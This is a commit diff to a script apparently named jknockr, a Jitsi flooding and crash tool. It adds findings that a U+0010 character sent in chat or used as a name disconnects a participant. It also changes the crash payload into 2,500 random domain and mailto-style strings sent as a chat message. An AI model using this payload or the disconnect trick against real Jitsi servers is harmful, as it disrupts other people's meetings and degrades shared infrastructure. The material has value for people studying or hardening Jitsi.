Added interesting finds when pentesting Jitsi and added mailto link usage in --crash

2024-10-12 22:50:35 -04:00 · 2024-10-12 22:50:35 -04:00 · 29ecb16fdc
commit 29ecb16fdc
parent 44e79eef56
2 changed files with 6 additions and 5 deletions
--- a/README.md
+++ b/README.md
@ -72,9 +72,10 @@ python3 jknockr.py <target> [options]
 - **Server Impact:** Running this script can significantly impact server performance. Monitor your server resources during testing.
 - **Legal Responsibility:** You are responsible for ensuring that your use of this script complies with all applicable laws and terms of service.

-## Disclaimer
-
-The developer provides this script "as is" without any warranties. Use it at your own risk. The developer is not responsible for any damage or misuse of this script.
+## Interesting Finds
+- Sending a [U+0010](https://unicode-explorer.com/c/0010) character disconnects you from the room. Same with using as your name.
+- Unicode in a URL is converted to puny code. *(`𓆨.中国` only 4 characters you send to the chat & itll convert to `xn--907d.xn--fiqs8s`)*
+- Using @ in a URL converts it to a `mailto://`

 ___

--- a/jknockr.py
+++ b/jknockr.py
@ -155,7 +155,7 @@ def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id:
                    if not tlds:
                        print(f'Client {client_id}: TLD list is empty. Using default TLDs.')
                        tlds = ['com', 'net', 'org', 'info', 'io']
-                    msg = ' '.join(f'{random_word(5)}.{random.choice(tlds)}' for _ in range(2500))
+					msg = ' '.join( f'{random_word(2)}@{random_word(2)}.{random.choice(tlds)}' if random.choice([True,False]) else f'{random_word(4)}.{random.choice(tlds)}' for _ in range(2500))
                elif args.message:
                    msg = args.message
                message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>